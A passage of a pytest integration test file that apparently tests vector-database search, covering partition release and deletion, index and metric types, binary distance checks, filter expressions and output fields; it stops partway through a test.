@pytest.mark.tags(CaseLabel.L1)
def test_search_before_after_delete(self, nq, dim, auto_id, _async):
"""
target: test search function before and after deletion
method: 1. search the collection
2. delete a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_before_after_delete: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. delete partitions
log.info("test_search_before_after_delete: deleting a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
collection_w.drop_partition(par[partition_num].name)
log.info("test_search_before_after_delete: deleted a partition")
collection_w.load()
# 4. search non-deleted part after delete partitions
log.info("test_search_before_after_delete: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_one(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_one: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release one partition
log.info("test_search_partition_after_release_one: releasing a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[partition_num].name])
log.info("test_search_partition_after_release_one: released a partition")
# 4. search collection after release one partition
log.info("test_search_partition_after_release_one: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_all(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release all partitions
3. search the collection
expected: 0 entity should be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_all: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release all partitions
log.info("test_search_partition_after_release_all: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[0].name, par[1].name])
log.info("test_search_partition_after_release_all: released a partition")
# 4. search collection after release all partitions
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release collection
3. load collection
4. search the pre-released collection
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
# 2. release collection
log.info("test_search_collection_after_release_load: releasing collection %s" % collection_w.name)
collection_w.release()
log.info("test_search_collection_after_release_load: released collection %s" % collection_w.name)
# 3. Search the pre-released collection after load
log.info("test_search_collection_after_release_load: loading collection %s" % collection_w.name)
collection_w.load()
log.info("test_search_collection_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6997")
def test_search_partition_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release a partition
3. load partition
4. search the pre-released partition
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
# 2. release collection
log.info("test_search_partition_after_release_load: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[1].name])
log.info("test_search_partition_after_release_load: released a partition")
# 3. Search the collection after load
limit = 1000
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 4. Search the pre-released partition after load
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_load_flush_load(self, nb, nq, dim, auto_id, _async):
"""
target: test search when load before flush
method: 1. search the collection
2. insert data and load
3. flush, and load
expected: search success with limit(topK)
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, auto_id=auto_id, dim=dim)[0]
# 2. insert data
insert_ids = cf.insert_data(collection_w, nb, auto_id=auto_id, dim=dim)[3]
# 3. load data
collection_w.load()
# 4. flush and load
collection_w.num_entities
collection_w.load()
# 5. search for new data without load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_new_data(self, nq, dim, auto_id, _async):
"""
target: test search new inserted data without load
method: 1. search the collection
2. insert new data
3. search the collection without load again
expected: new data should be searched
"""
# 1. initialize with data
limit = 1000
nb_old = 500
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb_old,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search for original data after load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_new_data: searching for original data after load")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp+1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old,
"_async": _async})
# 3. insert new data
nb_new = 300
_, _, _, insert_ids_new, time_stamp = cf.insert_data(collection_w, nb_new,
auto_id=auto_id, dim=dim,
insert_offset=nb_old)
insert_ids.extend(insert_ids_new)
# gracefulTime is default as 1s which allows data
# could not be searched instantly in gracefulTime
time.sleep(gracefulTime)
# 4. search for new data without load
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old + nb_new,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_max_dim(self, auto_id, _async):
"""
target: test search with max configuration
method: create connection, collection, insert and search with max dim
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 100,
auto_id=auto_id,
dim=max_dim)[0:4]
# 2. search
nq = 2
log.info("test_search_max_dim: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(max_dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, nq,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nq,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_different_index_with_params(self, dim, index, params, auto_id, _async):
"""
target: test search after different index
method: test search after different index and corresponding search params
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create index and load
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_index_different_metric_type(self, dim, index, params, auto_id, _async):
"""
target: test search with different metric type
method: test search with different metric type
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create different index
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
log.info("test_search_after_index_different_metric_type: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "IP"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_index_different_metric_type: Created index-%s" % index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index, "IP")
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_multiple_times(self, nb, nq, dim, auto_id, _async):
"""
target: test search for multiple times
method: search for multiple times
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search for multiple times
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_collection_multiple_times: searching round %d" % (i + 1))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_sync_async_multiple_times(self, nb, nq, dim, auto_id):
"""
target: test async search after sync search case
method: create connection, collection, insert,
sync search and async search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search
log.info("test_search_sync_async_multiple_times: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_sync_async_multiple_times: searching round %d" % (i + 1))
for _async in [False, True]:
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_multiple_vectors(self, nb, nq, dim, auto_id, _async):
"""
target: test search with multiple vectors
method: create connection, collection with multiple
vectors, insert and search
expected: search successfully with limit(topK)
"""
# 1. connect
self._connect()
# 2. create collection with multiple vectors
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
cf.gen_float_vec_field(dim=dim), cf.gen_float_vec_field(name="tmp", dim=dim)]
schema = cf.gen_collection_schema(fields=fields, auto_id=auto_id)
collection_w = self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={"name": c_name, "schema": schema})[0]
# 3. insert
vectors = [[random.random() for _ in range(dim)] for _ in range(nb)]
vectors_tmp = [[random.random() for _ in range(dim)] for _ in range(nb)]
data = [[i for i in range(nb)], [np.float32(i) for i in range(nb)], vectors, vectors_tmp]
if auto_id:
data = [[np.float32(i) for i in range(nb)], vectors, vectors_tmp]
res = collection_w.insert(data)
insert_ids = res.primary_keys
assert collection_w.num_entities == nb
# 4. load
collection_w.load()
# 5. search all the vectors
log.info("test_search_multiple_vectors: searching collection %s" % collection_w.name)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
collection_w.search(vectors[:nq], "tmp",
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_one_partition(self, nb, auto_id, _async):
"""
target: test search from partition
method: search from one partition
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search in one partition
log.info("test_search_index_one_partition: searching (1000 entities) through one partition")
limit = 1000
par = collection_w.partitions
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
search_params = {"metric_type": "L2", "params": {"nprobe": 128}}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, nb, nq, dim, auto_id, _async):
"""
target: test search from partitions
method: search from partitions
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search through partitions
log.info("test_search_index_partitions: searching (1000 entities) through partitions")
par = collection_w.partitions
log.info("test_search_index_partitions: partitions: %s" % par)
limit = 1000
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[0].name, par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_names",
[["(.*)"], ["search(.*)"]])
def test_search_index_partitions_fuzzy(self, nb, nq, dim, partition_names, auto_id, _async):
"""
target: test search from partitions
method: search from partitions with fuzzy
partition name
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions_fuzzy: searching through partitions")
limit = 1000
limit_check = limit
par = collection_w.partitions
if partition_names == ["search(.*)"]:
insert_ids = insert_ids[par[0].num_entities:]
if limit > par[1].num_entities:
limit_check = par[1].num_entities
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
partition_names, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_empty(self, nq, dim, auto_id, _async):
"""
target: test search the empty partition
method: search from the empty partition
expected: searched successfully with 0 results
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, auto_id=auto_id,
dim=dim, is_index=True)[0]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create empty partition
partition_name = "search_partition_empty"
collection_w.create_partition(partition_name=partition_name, description="search partition empty")
par = collection_w.partitions
log.info("test_search_index_partition_empty: partitions: %s" % par)
collection_w.load()
# 3. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 4. search the empty partition
log.info("test_search_index_partition_empty: searching %s "
"entities through empty partition" % default_limit)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, [partition_name],
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_jaccard_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with JACCARD
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids, time_stamp = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.jaccard(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.jaccard(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_hamming_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with HAMMING
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "HAMMING"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
collection_w.load()
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.hamming(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.hamming(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "HAMMING", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6843")
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_tanimoto_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with TANIMOTO
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
log.info("auto_id= %s, _async= %s" % (auto_id, _async))
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "TANIMOTO"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "TANIMOTO", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions())
def test_search_with_expression(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True,
nb, dim=dim,
is_index=True)[0:4]
# filter result with expression in collection
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
int64 = _vectors.int64[i]
float = _vectors.float[i]
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with expression
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 7910")
@pytest.mark.parametrize("bool_type", [True, False, "true", "false", 1, 0, 2])
def test_search_with_expression_bool(self, dim, auto_id, _async, bool_type):
"""
target: test search with different bool expressions
method: search with different bool expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. filter result with expression in collection
filter_ids = []
bool_type_cmp = bool_type
if bool_type == "true":
bool_type_cmp = True
if bool_type == "false":
bool_type_cmp = False
for i, _id in enumerate(insert_ids):
if _vectors[0][f"{default_bool_field_name}"][i] == bool_type_cmp:
filter_ids.append(_id)
# 4. search with different expressions
expression = f"{default_bool_field_name} == {bool_type}"
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions_field(default_float_field_name))
def test_search_with_expression_auto_id(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=True,
dim=dim,
is_index=True)[0:4]
# filter result with expression in collection
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
exec(f"{default_float_field_name} = _vectors.{default_float_field_name}[i]")
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with different expressions
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
def test_search_expression_all_data_type(self, nb, nq, dim, auto_id, _async):
"""
target: test search using different supported data type
method: search using different supported data type
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_expression_all_data_type: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
search_exp = "int64 >= 0 && int32 >= 0 && int16 >= 0 " \
"&& int8 >= 0 && float >= 0 && double >= 0"
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_empty(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with empty output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields_empty: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_field(self, auto_id, _async):
"""
target: test search with output fields
method: search with one output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with multiple output_field
expected: search success
"""
# 1. initialize with data
